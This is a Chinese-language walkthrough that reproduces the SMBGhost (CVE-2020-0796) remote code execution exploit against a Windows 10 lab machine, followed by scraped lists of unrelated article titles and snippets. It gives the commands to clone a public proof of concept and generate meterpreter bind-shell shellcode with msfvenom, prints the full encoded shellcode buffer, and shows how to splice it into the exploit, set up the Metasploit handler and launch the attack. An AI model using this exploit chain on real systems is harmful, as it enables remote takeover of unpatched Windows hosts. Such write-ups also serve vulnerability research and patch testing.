CVE-2020-0796

攻击机:win10:192.168.205.1

靶机win10:192.168.205.132

关闭defender防火墙

0x01 影响版本

Windows 10 1903版本(用于基于x32的系统)

Windows 10 1903版(用于基于x64的系统)

Windows 10 1903版(用于基于ARM64的系统)

Windows Server 1903版(服务器核心安装)

Windows 10 1909版本(用于基于x32的系统)

Windows 10版本1909(用于基于x64的系统)

Windows 10 1909版(用于基于ARM64的系统)

Windows Server版本1909(服务器核心安装)

0x02 下载poc

C:\Users\Administrator\Desktop>git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

Cloning into 'SMBGhost_RCE_PoC'...

remote: Enumerating objects: 42, done.

remote: Counting objects: 100% (42/42), done.

remote: Compressing objects: 100% (32/32), done.

remote: Total 42 (delta 20), reused 23 (delta 9), pack-reused 0

Unpacking objects: 100% (42/42), 19.48 KiB | 124.00 KiB/s, done.

0x03 win10版本



没有KB4551762

0x04 msf生成shellcode

payload要正向监听

C:\Users\Administrator\Desktop\SMBGhost_RCE_PoC>msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

F:/msf/embedded/lib/ruby/gems/2.6.0/gems/backports-3.15.0/lib/backports/std_lib.rb:9: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x64 from the payload

Found 3 compatible encoders

Attempting to encode payload with 1 iterations of generic/none

generic/none failed with Encoding failed due to a bad character (index=10, char=0x00)

Attempting to encode payload with 1 iterations of x64/xor_dynamic

x64/xor_dynamic succeeded with size 546 (iteration=0)

x64/xor_dynamic chosen with final size 546

Payload size: 546 bytes

Final size of python file: 2657 bytes

buf =  b""

buf += b"\xeb\x27\x5b\x53\x5f\xb0\x81\xfc\xae\x75\xfd\x57\x59"

buf += b"\x53\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66"

buf += b"\x81\x3f\xcd\x39\x74\x07\x80\x3e\x81\x75\xea\xeb\xe6"

buf += b"\xff\xe1\xe8\xd4\xff\xff\xff\x05\x81\xf9\x4d\x84\xe1"

buf += b"\xf5\xfa\xfa\xfa\xed\xc9\x05\x05\x05\x44\x54\x44\x55"

buf += b"\x57\x54\x53\x4d\x34\xd7\x60\x4d\x8e\x57\x65\x4d\x8e"

buf += b"\x57\x1d\x4d\x8e\x57\x25\x4d\x8e\x77\x55\x4d\x0a\xb2"

buf += b"\x4f\x4f\x48\x34\xcc\x4d\x34\xc5\xa9\x39\x64\x79\x07"

buf += b"\x29\x25\x44\xc4\xcc\x08\x44\x04\xc4\xe7\xe8\x57\x44"

buf += b"\x54\x4d\x8e\x57\x25\x8e\x47\x39\x4d\x04\xd5\x63\x84"

buf += b"\x7d\x1d\x0e\x07\x0a\x80\x77\x05\x05\x05\x8e\x85\x8d"

buf += b"\x05\x05\x05\x4d\x80\xc5\x71\x62\x4d\x04\xd5\x55\x8e"

buf += b"\x4d\x1d\x41\x8e\x45\x25\x4c\x04\xd5\xe6\x53\x4d\xfa"

buf += b"\xcc\x44\x8e\x31\x8d\x4d\x04\xd3\x48\x34\xcc\x4d\x34"

buf += b"\xc5\xa9\x44\xc4\xcc\x08\x44\x04\xc4\x3d\xe5\x70\xf4"

buf += b"\x49\x06\x49\x21\x0d\x40\x3c\xd4\x70\xdd\x5d\x41\x8e"

buf += b"\x45\x21\x4c\x04\xd5\x63\x44\x8e\x09\x4d\x41\x8e\x45"

buf += b"\x19\x4c\x04\xd5\x44\x8e\x01\x8d\x4d\x04\xd5\x44\x5d"

buf += b"\x44\x5d\x5b\x5c\x5f\x44\x5d\x44\x5c\x44\x5f\x4d\x86"

buf += b"\xe9\x25\x44\x57\xfa\xe5\x5d\x44\x5c\x5f\x4d\x8e\x17"

buf += b"\xec\x4e\xfa\xfa\xfa\x58\x4c\xbb\x72\x76\x37\x5a\x36"

buf += b"\x37\x05\x05\x44\x53\x4c\x8c\xe3\x4d\x84\xe9\xa5\x04"

buf += b"\x05\x05\x4c\x8c\xe0\x4d\x34\xc5\x55\x55\x4c\xc2\xc1"

buf += b"\x07\x05\x14\x59\x44\x51\x4c\x8c\xe1\x49\x8c\xf4\x44"

buf += b"\xbf\x49\x72\x23\x02\xfa\xd0\x49\x8c\xef\x6d\x04\x04"

buf += b"\x05\x05\x5c\x44\xbf\x2c\x85\x6e\x05\xfa\xd0\x6f\x07"

buf += b"\x5c\x55\x55\x48\x34\xcc\x48\x34\xc5\x4d\xfa\xc5\x4d"

buf += b"\x8c\xc7\x44\xbf\xef\x0a\xda\xe5\xfa\xd0\x4d\x8c\xc2"

buf += b"\x6f\x15\x44\x5d\x49\x8c\xe7\x4d\x8c\xfc\x44\xbf\xc7"

buf += b"\xde\x32\x62\xfa\xd0\x4d\x34\xd7\x4d\x8c\xfc\x44\xbf"

buf += b"\xb2\xec\x3d\xfa\xfa\xd0\x48\x34\xc5\x4d\x34\xd7\x4d"

buf += b"\x8c\xfc\x44\xbf\x71\xe9\x3e\xe4\xfa\xd0\x4d\x8c\xfc"

buf += b"\x4d\x8c\xc2\x44\xbf\x70\x6b\x48\x64\xfa\xd0\x4d\x84"

buf += b"\xc1\xb5\x07\x05\x05\x4d\x86\xe9\x15\x4d\x8c\xe7\x48"

buf += b"\x34\xcc\x6f\x01\x44\x5d\x4d\x8c\xfc\x44\xbf\x07\xdc"

buf += b"\xcd\x5a\xfa\xd0\x4d\x86\xc1\x25\x5b\x8c\xf3\x6f\x45"

buf += b"\x44\x5c\x6d\x05\x15\x05\x05\x44\x5d\x4d\x8c\xf7\x4d"

buf += b"\x34\xcc\x44\xbf\x5d\xa1\x56\xe0\xfa\xd0\x4d\x8c\xc6"

buf += b"\x4c\x8c\xc2\x48\x34\xcc\x4c\x8c\xf5\x4d\x8c\xdf\x4d"

buf += b"\x8c\xfc\x44\xbf\x07\xdc\xcd\x5a\xfa\xd0\x4d\x04\xc6"

buf += b"\x4d\x2c\xc3\x4d\x80\xf3\x70\xe4\x44\xfa\xe2\x5d\x6f"

buf += b"\x05\x5c\x4c\xc2\xc7\xf5\xb0\xa7\x53\xfa\xd0\xcd\x39"

0x05 替换shellcode

先把msf中的buf全部替换为USER_PAYLOAD,然后把全部内容替换给exploit.py中的USER_PAYLOAD处

0x06 msf监听

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

payload => windows/x64/meterpreter/bind_tcp

msf5 exploit(multi/handler) > set lport 4444

lport => 4444

msf5 exploit(multi/handler) > set rhost 192.168.205.132

rhost => 192.168.205.132

msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 192.168.205.132:4444

0x07 执行exp

这里测试了2.x和3.x,3.x成功,2.x蓝了

python3 exploit.py -ip 192.168.205.132

CVE-2020-0796(Windows SMBv3) RCE漏洞复现的更多相关文章

  1. Windows SMBv3 CVE-2020-0796 漏洞分析和l漏洞复现

    0x00  漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码.攻击者利用该漏洞无须权限即可实现远 ...

  2. 【Vulhub】CVE-2019-3396 Confluence RCE漏洞复现

    CVE-2019-3396 Confluence RCE漏洞复现 一.环境搭建 选择的vulhub里的镜像,进入vulhub/Confluence/CVE-2019-3396目录下,执行 docker ...

  3. Apache Solr JMX服务 RCE 漏洞复现

    Apache Solr JMX服务 RCE 漏洞复现 ps:Apache Solr8.2.0下载有点慢,需要的话评论加好友我私发你 0X00漏洞简介 该漏洞源于默认配置文件solr.in.sh中的EN ...

  4. Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

    Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一.漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: ...

  5. Apache Solr Velocity模板注入RCE漏洞复现

    Apache Solr Velocity模板注入RCE漏洞复现 一.Apache Solr介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通 ...

  6. CVE-2019-5475:Nexus2 yum插件RCE漏洞复现

    0x00 前言 如果有想一起做漏洞复现的小伙伴,欢迎加入我们,公众号内点击联系作者即可 提示:由于某些原因,公众号内部分工具即将移除,如果有需要的请尽快保存 0x01 漏洞概述 最近hackerone ...

  7. Solr 8.2.0最新RCE漏洞复现

    漏洞描述 国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入漏洞.该漏洞可以攻击最新版本的Solr. 漏洞编号 无 影响范围 包括但不限于8.2.0(20191031最 ...

  8. Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

    0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布.数据通信以及容错机制等功能.基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任 ...

  9. Joomla框架搭建&远程代码执行(RCE)漏洞复现

    一.漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.8,官网: https://downloads.joomla.org/,漏洞位于根 ...

随机推荐

  1. hook框架-frida使用-环境配置

    一.python安装模块 pip3 install frida pip3 install frida-tools 二.下载frida-server #下载链接 https://github.com/f ...

  2. ipvsadm服务报错/bin/bash: /etc/sysconfig/ipvsadm: No such file or directory

    问题: 在执行重启ipvsadm服务时报错: 提示没有找到/etc/sysconfig/ipvsadm 解决: [root@lvs1 ~]# ipvsadm --save > /etc/sysc ...

  3. Linux kernel 模块 hello 测试

    原文链接:https://www.cnblogs.com/nerohwang/p/3621316.html hello.c 文件: #include <linux/kernel.h> /* ...

  4. 第6篇 Scrum 冲刺博客

    1.站立会议 照骗 进度 成员 昨日完成任务 今日计划任务 遇到的困难 钟智锋 重构游戏逻辑代码 改写部分客户端代码,制作单机版 庄诗楷 进行了相关的装饰改进 与其他部分合成完成游戏 合成遇到bug, ...

  5. python chardet模块查看字符编码方式

    电脑配置:联想笔记本电脑 windows8系统 Python版本:2.7.8 本文章撰写时间:2014.12.25 作者:陈东陈 阅读说明: 1.本文都是先解释,后放图片: 2.文中斜体部分要么为需要 ...

  6. Sublime Text3 个人使用安装设置

    1 安装Package Control 自动安装: 点击 View > Show Console 输入以下代码并运行 import urllib.request,os,hashlib; h = ...

  7. 接口测试 Mock 实战 | 结合 jq 完成批量化的手工 Mock

    本文霍格沃兹测试学院学员学习实践笔记. 一.应用背景 因为本章的内容是使用jq工具配合完成,因此在开始部分会先花一定的篇幅介绍jq机器使用,如果读者已经熟悉jq,可以直接跳过这部分. 先来看应用场景, ...

  8. 推荐一款万能抓包神器:Fiddler Everywhere

    搞IT技术的同行,相信没有几个人是不会抓包这项技能的(如果很不幸你中枪了,那希望这篇文章给你一些动力),市面上的抓包工具也有很多,常用的有:Charles.Fiddler.Burpsuite.Wire ...

  9. 什么是URL标准化

    http://www.wocaoseo.com/thread-194-1-1.html RL标准化是来自于国外matt cutts的博客文章,期望能给蜘蛛一个规范化的URL作为收录的标准.举个简单的例 ...

  10. 8点了解Java服务端单元测试

    一. 前言 单元测试并不只是为了验证你当前所写的代码是否存在问题,更为重要的是它可以很大程度的保障日后因业务变更.修复Bug或重构等引起的代码变更而导致(或新增)的风险. 同时将单元测试提前到编写正式 ...